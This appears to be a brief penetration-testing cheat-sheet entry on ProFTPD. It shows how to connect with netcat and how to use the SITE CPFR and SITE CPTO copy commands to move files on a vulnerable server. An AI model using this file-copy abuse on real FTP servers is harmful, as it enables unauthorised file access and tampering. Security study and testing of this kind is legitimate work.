ProFtpd is a free and open-sourceย FTPย server, compatible with Unix and Windows systems. Its also been vulnerable in the past software versions.

Connect to ftp using netcat

nc HOST PORT

Copy module

# Select the file to copy
SITE CPFR /path/to/file
# Select where to copy it
SITE CPTO /new/path/to/file